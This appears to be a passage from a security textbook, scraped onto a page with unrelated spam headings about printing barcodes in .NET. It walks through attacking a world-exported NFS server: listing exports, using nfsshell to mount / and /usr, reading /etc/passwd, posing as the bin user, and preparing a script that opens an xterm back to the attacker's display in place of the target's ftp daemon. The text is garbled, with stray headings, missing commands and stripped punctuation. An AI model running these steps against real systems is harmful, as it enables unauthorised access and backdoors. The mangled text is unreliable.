nlockmgr nlockmgr nlockmgr in .NET

Print Code-128 in .NET nlockmgr nlockmgr nlockmgr

By querying the portmapper, we can see that mountd and the NFS server are running, which indicates that the target systems may be exporting one or more file systems

[tsunami]# showmount -e quake Export list for quake: / (everyone) /usr (everyone)

The results of showmount indicate that the entire / and /usr file systems are exported to the world, which is a huge security risk All attackers would have to do is mount / or /usr, and they would have access to the entire / and /usr file system, subject to the permissions on each file and directory Mount is available in most flavors of UNIX, but it is not as flexible as some other tools To learn more about UNIX s mount command, you can run man mount to pull up the manual for your particular version, as the syntax may differ:

8:

A more useful tool for NFS exploration is nfsshell by Leendert van Doorn, which is available from ftp://ftpcsvunl/pub/leendert/nfsshelltargz The nfsshell package provides a robust client called nfs Nfs operates like an FTP client and allows easy manipulation of a remote file system Nfs has many options worth exploring

[tsunami]# nfs nfs> help host <host> - set remote host name uid [<uid> [<secret-key>]] - set remote user id gid [<gid>] - set remote group id cd [<path>] - change remote working directory lcd [<path>] - change local working directory cat <filespec> - display remote file ls [-l] <filespec> - list remote directory get <filespec> - get remote files df - file system information rm <file> - delete remote file ln <file1> <file2> - link file mv <file1> <file2> - move file mkdir <dir> - make remote directory rmdir <dir> - remove remote directory chmod <mode> <file> - change mode chown <uid>[<gid>] <file> - change owner put <local-file> [<remote-file>] - put file mount [-upTU] [-P port] <path> - mount file system umount - umount remote file system umountall - umount all remote file systems export - show all exported file systems dump - show all remote mounted file systems status - general status report help - this help message quit - its all in the name bye - good bye handle [<handle>] - get/set directory file handle mknod <name> [b/c major minor] [p] - make device

We must first tell nfs what host we are interested in mounting:

Let s list the file systems that are exported:

Now we must mount / to access this file system:

Next we will check the status of the connection and determine the UID used when the file system was mounted:

nfs> status User id : Group id : Remote host : Mount path : Transfer size: -2 -2 'quake' '/' 8192

We can see that we have mounted /, and that our UID and GID are 2 For security reasons, if you mount a remote file system as root, your UID and GID will map to something other than 0 In most cases (without special options), you can mount a file system as any UID and GID other than 0 or root Because we mounted the entire file system, we can easily list the contents of the /etc/passwd file

nfs> cd /etc nfs> cat passwd root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4x Nobody:/: gk:x:1001:10::/export/home/gk:/bin/sh sm:x:1003:10::/export/home/sm:/bin/sh

8:

Listing /etc/passwd provides the usernames and associated user IDs However, the password file is shadowed so it cannot be used to crack passwords Since we can t crack any passwords and we can t mount the file system as root, we must determine what other UIDs will allow privileged access Daemon has potential, but bin or UID 2 is a good bet because on many systems the user bin owns the binaries If attackers can gain access to the binaries via NFS or any other means, most systems don t stand a chance Now we must mount /usr, alter our UID and GID, and attempt to gain access to the binaries:

nfs> mount /usr Using a privileged port (1022) Mount '/usr', TCP, transfer size 8192 bytes nfs> uid 2 nfs> gid 2 nfs> status User id : 2 Group id : 2 Remote host : 'quake' Mount path : '/usr' Transfer size: 8192

We now have all the privileges of bin on the remote system In our example, the file systems were not exported with any special options that would limit bin s ability to create or modify files At this point, all that is necessary is to fire off an xterm or to create a back channel to our system to gain access to the target system We create the following script on our system and name it inftpd:

#!/bin/sh /usr/openwin/bin/xterm -display 10101010:00 &

Next, on the target system we cd into /sbin and replace inftpd with our version: